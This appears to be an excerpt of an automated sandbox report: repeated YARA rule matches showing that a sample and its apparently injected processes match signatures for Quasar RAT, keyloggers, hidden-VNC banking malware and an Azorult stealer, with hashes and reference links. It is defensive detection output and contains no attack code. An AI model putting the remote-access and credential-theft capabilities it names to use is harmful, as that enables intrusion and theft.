Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE; Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE; Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE; Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE; Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE; Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
